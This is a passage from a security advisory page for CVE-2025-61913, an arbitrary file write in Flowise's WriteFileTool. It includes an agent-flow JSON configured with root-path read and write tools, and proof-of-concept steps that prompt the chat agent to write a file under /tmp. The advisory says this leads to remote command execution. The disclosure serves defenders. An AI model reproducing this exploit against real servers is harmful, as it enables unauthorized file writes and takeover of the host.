\"display\": true\n          },\n          {\n            \"label\": \"Messages\",\n            \"name\": \"agentMessages\",\n            \"type\": \"array\",\n            \"optional\": true,\n            \"acceptVariable\": true,\n            \"array\": [\n              {\n                \"label\": \"Role\",\n                \"name\": \"role\",\n                \"type\": \"options\",\n                \"options\": [\n                  {\n                    \"label\": \"System\",\n                    \"name\": \"system\"\n                  },\n                  {\n                    \"label\": \"Assistant\",\n                    \"name\": \"assistant\"\n                  },\n                  {\n                    \"label\": \"Developer\",\n                    \"name\": \"developer\"\n                  },\n                  {\n                    \"label\": \"User\",\n                    \"name\": \"user\"\n                  }\n                ]\n              },\n              {\n                \"label\": \"Content\",\n                \"name\": \"content\",\n                \"type\": \"string\",\n                \"acceptVariable\": true,\n                \"generateInstruction\": true,\n                \"rows\": 4\n              }\n            ],\n            \"id\": \"agentAgentflow_0-input-agentMessages-array\",\n            \"display\": true\n          },\n          {\n            \"label\": \"OpenAI Built-in Tools\",\n            \"name\": \"agentToolsBuiltInOpenAI\",\n            \"type\": \"multiOptions\",\n            \"optional\": true,\n            \"options\": [\n              {\n                \"label\": \"Web Search\",\n                \"name\": \"web_search_preview\",\n                \"description\": \"Search the web for the latest information\"\n              },\n              {\n                \"label\": \"Code Interpreter\",\n                \"name\": \"code_interpreter\",\n                \"description\": \"Write and run Python code in a sandboxed environment\"\n              },\n              {\n                \"label\": \"Image Generation\",\n                \"name\": \"image_generation\",\n                \"description\": \"Generate images based on a text prompt\"\n              }\n            ],\n            \"show\": {\n              \"agentModel\": \"chatOpenAI\"\n            },\n            \"id\": \"agentAgentflow_0-input-agentToolsBuiltInOpenAI-multiOptions\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Tools\",\n            \"name\": \"agentTools\",\n            \"type\": \"array\",\n            \"optional\": true,\n            \"array\": [\n              {\n                \"label\": \"Tool\",\n                \"name\": \"agentSelectedTool\",\n                \"type\": \"asyncOptions\",\n                \"loadMethod\": \"listTools\",\n                \"loadConfig\": true\n              },\n              {\n                \"label\": \"Require Human Input\",\n                \"name\": \"agentSelectedToolRequiresHumanInput\",\n                \"type\": \"boolean\",\n                \"optional\": true\n              }\n            ],\n            \"id\": \"agentAgentflow_0-input-agentTools-array\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Knowledge (Document Stores)\",\n            \"name\": \"agentKnowledgeDocumentStores\",\n            \"type\": \"array\",\n            \"description\": \"Give your agent context about different document sources. Document stores must be upserted in advance.\",\n            \"array\": [\n              {\n                \"label\": \"Document Store\",\n                \"name\": \"documentStore\",\n                \"type\": \"asyncOptions\",\n                \"loadMethod\": \"listStores\"\n              },\n              {\n                \"label\": \"Describe Knowledge\",\n                \"name\": \"docStoreDescription\",\n                \"type\": \"string\",\n                \"generateDocStoreDescription\": true,\n                \"placeholder\": \"Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information\",\n                \"rows\": 4\n              },\n              {\n                \"label\": \"Return Source Documents\",\n                \"name\": \"returnSourceDocuments\",\n                \"type\": \"boolean\",\n                \"optional\": true\n              }\n            ],\n            \"optional\": true,\n            \"id\": \"agentAgentflow_0-input-agentKnowledgeDocumentStores-array\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Knowledge (Vector Embeddings)\",\n            \"name\": \"agentKnowledgeVSEmbeddings\",\n            \"type\": \"array\",\n            \"description\": \"Give your agent context about different document sources from existing vector stores and embeddings\",\n            \"array\": [\n              {\n                \"label\": \"Vector Store\",\n                \"name\": \"vectorStore\",\n                \"type\": \"asyncOptions\",\n                \"loadMethod\": \"listVectorStores\",\n                \"loadConfig\": true\n              },\n              {\n                \"label\": \"Embedding Model\",\n                \"name\": \"embeddingModel\",\n                \"type\": \"asyncOptions\",\n                \"loadMethod\": \"listEmbeddings\",\n                \"loadConfig\": true\n              },\n              {\n                \"label\": \"Knowledge Name\",\n                \"name\": \"knowledgeName\",\n                \"type\": \"string\",\n                \"placeholder\": \"A short name for the knowledge base, this is useful for the AI to know when and how to search for correct information\"\n              },\n              {\n                \"label\": \"Describe Knowledge\",\n                \"name\": \"knowledgeDescription\",\n                \"type\": \"string\",\n                \"placeholder\": \"Describe what the knowledge base is about, this is useful for the AI to know when and how to search for correct information\",\n                \"rows\": 4\n              },\n              {\n                \"label\": \"Return Source Documents\",\n                \"name\": \"returnSourceDocuments\",\n                \"type\": \"boolean\",\n                \"optional\": true\n              }\n            ],\n            \"optional\": true,\n            \"id\": \"agentAgentflow_0-input-agentKnowledgeVSEmbeddings-array\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Enable Memory\",\n            \"name\": \"agentEnableMemory\",\n            \"type\": \"boolean\",\n            \"description\": \"Enable memory for the conversation thread\",\n            \"default\": true,\n            \"optional\": true,\n            \"id\": \"agentAgentflow_0-input-agentEnableMemory-boolean\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Memory Type\",\n            \"name\": \"agentMemoryType\",\n            \"type\": \"options\",\n            \"options\": [\n              {\n                \"label\": \"All Messages\",\n                \"name\": \"allMessages\",\n                \"description\": \"Retrieve all messages from the conversation\"\n              },\n              {\n                \"label\": \"Window Size\",\n                \"name\": \"windowSize\",\n                \"description\": \"Uses a fixed window size to surface the last N messages\"\n              },\n              {\n                \"label\": \"Conversation Summary\",\n                \"name\": \"conversationSummary\",\n                \"description\": \"Summarizes the whole conversation\"\n              },\n              {\n                \"label\": \"Conversation Summary Buffer\",\n                \"name\": \"conversationSummaryBuffer\",\n                \"description\": \"Summarize conversations once token limit is reached. Default to 2000\"\n              }\n            ],\n            \"optional\": true,\n            \"default\": \"allMessages\",\n            \"show\": {\n              \"agentEnableMemory\": true\n            },\n            \"id\": \"agentAgentflow_0-input-agentMemoryType-options\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Window Size\",\n            \"name\": \"agentMemoryWindowSize\",\n            \"type\": \"number\",\n            \"default\": \"20\",\n            \"description\": \"Uses a fixed window size to surface the last N messages\",\n            \"show\": {\n              \"agentMemoryType\": \"windowSize\"\n            },\n            \"id\": \"agentAgentflow_0-input-agentMemoryWindowSize-number\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Max Token Limit\",\n            \"name\": \"agentMemoryMaxTokenLimit\",\n            \"type\": \"number\",\n            \"default\": \"2000\",\n            \"description\": \"Summarize conversations once token limit is reached. Default to 2000\",\n            \"show\": {\n              \"agentMemoryType\": \"conversationSummaryBuffer\"\n            },\n            \"id\": \"agentAgentflow_0-input-agentMemoryMaxTokenLimit-number\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Input Message\",\n            \"name\": \"agentUserMessage\",\n            \"type\": \"string\",\n            \"description\": \"Add an input message as user message at the end of the conversation\",\n            \"rows\": 4,\n            \"optional\": true,\n            \"acceptVariable\": true,\n            \"show\": {\n              \"agentEnableMemory\": true\n            },\n            \"id\": \"agentAgentflow_0-input-agentUserMessage-string\",\n            \"display\": false\n          },\n          {\n            \"label\": \"Return Response As\",\n            \"name\": \"agentReturnResponseAs\",\n            \"type\": \"options\",\n            \"options\": [\n              {\n                \"label\": \"User Message\",\n                \"name\": \"userMessage\"\n              },\n              {\n                \"label\": \"Assistant Message\",\n                \"name\": \"assistantMessage\"\n              }\n            ],\n            \"default\": \"userMessage\",\n            \"id\": \"agentAgentflow_0-input-agentReturnResponseAs-options\",\n            \"display\": true\n          },\n          {\n            \"label\": \"Update Flow State\",\n            \"name\": \"agentUpdateState\",\n            \"description\": \"Update runtime state during the execution of the workflow\",\n            \"type\": \"array\",\n            \"optional\": true,\n            \"acceptVariable\": true,\n            \"array\": [\n              {\n                \"label\": \"Key\",\n                \"name\": \"key\",\n                \"type\": \"asyncOptions\",\n                \"loadMethod\": \"listRuntimeStateKeys\",\n                \"freeSolo\": true\n              },\n              {\n                \"label\": \"Value\",\n                \"name\": \"value\",\n                \"type\": \"string\",\n                \"acceptVariable\": true,\n                \"acceptNodeOutputAsVariable\": true\n              }\n            ],\n            \"id\": \"agentAgentflow_0-input-agentUpdateState-array\",\n            \"display\": true\n          }\n        ],\n        \"inputAnchors\": [],\n        \"inputs\": {\n          \"agentModel\": \"chatOpenRouter\",\n          \"agentMessages\": [\n            {\n              \"role\": \"\",\n              \"content\": \"\u003cp\u003e\u003cspan class=\\\"variable\\\" data-type=\\\"mention\\\" data-id=\\\"question\\\" data-label=\\\"question\\\"\u003e{{ question }}\u003c/span\u003e \u003c/p\u003e\"\n            }\n          ],\n          \"agentTools\": [\n            {\n              \"agentSelectedTool\": \"readFile\",\n              \"agentSelectedToolRequiresHumanInput\": \"\",\n              \"agentSelectedToolConfig\": {\n                \"basePath\": \"/\",\n                \"agentSelectedTool\": \"readFile\"\n              }\n            },\n            {\n              \"agentSelectedTool\": \"writeFile\",\n              \"agentSelectedToolRequiresHumanInput\": \"\",\n              \"agentSelectedToolConfig\": {\n                \"basePath\": \"/\",\n                \"agentSelectedTool\": \"writeFile\"\n              }\n            }\n          ],\n          \"agentKnowledgeDocumentStores\": \"\",\n          \"agentKnowledgeVSEmbeddings\": \"\",\n          \"agentEnableMemory\": false,\n          \"agentReturnResponseAs\": \"userMessage\",\n          \"agentUpdateState\": \"\",\n          \"undefined\": \"\",\n          \"agentModelConfig\": {\n            \"cache\": \"\",\n            \"modelName\": \"qwen/qwen3-30b-a3b\",\n            \"temperature\": 0.9,\n            \"streaming\": true,\n            \"maxTokens\": \"\",\n            \"topP\": \"\",\n            \"frequencyPenalty\": \"\",\n            \"presencePenalty\": \"\",\n            \"timeout\": \"\",\n            \"basepath\": \"https://openrouter.ai/api/v1\",\n            \"baseOptions\": \"\",\n            \"agentModel\": \"chatOpenRouter\"\n          }\n        },\n        \"outputAnchors\": [\n          {\n            \"id\": \"agentAgentflow_0-output-agentAgentflow\",\n            \"label\": \"Agent\",\n            \"name\": \"agentAgentflow\"\n          }\n        ],\n        \"outputs\": {},\n        \"selected\": false\n      },\n      \"type\": \"agentFlow\",\n      \"width\": 232,\n      \"height\": 100,\n      \"selected\": false,\n      \"positionAbsolute\": {\n        \"x\": -63.5,\n        \"y\": 89.125\n      },\n      \"dragging\": false\n    }\n  ],\n  \"edges\": [\n    {\n      \"source\": \"startAgentflow_0\",\n      \"sourceHandle\": \"startAgentflow_0-output-startAgentflow\",\n      \"target\": \"agentAgentflow_0\",\n      \"targetHandle\": \"agentAgentflow_0\",\n      \"data\": {\n        \"sourceColor\": \"#7EE787\",\n        \"targetColor\": \"#4DD0E1\",\n        \"isHumanInput\": false\n      },\n      \"type\": \"agentFlow\",\n      \"id\": \"startAgentflow_0-startAgentflow_0-output-startAgentflow-agentAgentflow_0-agentAgentflow_0\"\n    },\n    {\n      \"source\": \"agentAgentflow_0\",\n      \"sourceHandle\": \"agentAgentflow_0-output-agentAgentflow\",\n      \"target\": \"directReplyAgentflow_0\",\n      \"targetHandle\": \"directReplyAgentflow_0\",\n      \"data\": {\n        \"sourceColor\": \"#4DD0E1\",\n        \"targetColor\": \"#4DDBBB\",\n        \"isHumanInput\": false\n      },\n      \"type\": \"agentFlow\",\n      \"id\": \"agentAgentflow_0-agentAgentflow_0-output-agentAgentflow-directReplyAgentflow_0-directReplyAgentflow_0\"\n    }\n  ]\n}\n```\n5. Click on \"AgentFlows\" on the left, then click \"Add New\" on the right to enter the Agent creation page. Click the gear button in the upper right corner, select \"Load Agents,\" choose the agent.json file, and after successful import, you will see three connected nodes.\n6. Double-click the middle \"Agent 0\" node, click \"ChatOpenRouter Parameters,\" then \"Connect Credential,\" and select \"Create New.\" Enter a valid OpenRouter API Key. Alternatively, click \"Model\" to choose another LLM provider. Once done, click the save button in the upper right corner.\n7. After saving, click the purple chat button in the upper right corner and enter: Write \"hacked\" to /tmp/hacked.txt.  \n8. After the call is completed, log in to the container via `docker exec -it [container id] sh`, and you can see that the file has been successfully written.\n\n### Impact\n\nAuthenticated attackers can exploit this vulnerability to write arbitrary files to any path on the server, ultimately achieving remote command execution.\n\n### Credit\n\nThis vulnerability was discovered by:\n\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine\n\nCVE(s) and credit(s) are preferred.\n\nIf you have any questions regarding the vulnerability details, please feel free to reach out to us for further discussion. Our email address is xlabai@tencent.com.",
  "id": "GHSA-jv9m-vf54-chjj",
  "modified": "2025-11-15T03:13:52Z",
  "published": "2025-10-09T15:21:39Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-j44m-5v8f-gc9c"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-jv9m-vf54-chjj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61913"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/pull/5275"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/commit/1fb12cd93143592a18995f63b781d25b354d48a3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FlowiseAI/Flowise"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.8"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Flowise is vulnerable to arbitrary file write through its WriteFileTool "
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-61913 (GCVE-0-2025-61913)

Vulnerability from cvelistv5

fkie_cve-2025-61913

Vulnerability from fkie_nvd

ghsa-jv9m-vf54-chjj

Vulnerability from github

Summary

Details

PoC

Impact

Credit

Tags

Sightings

Nomenclature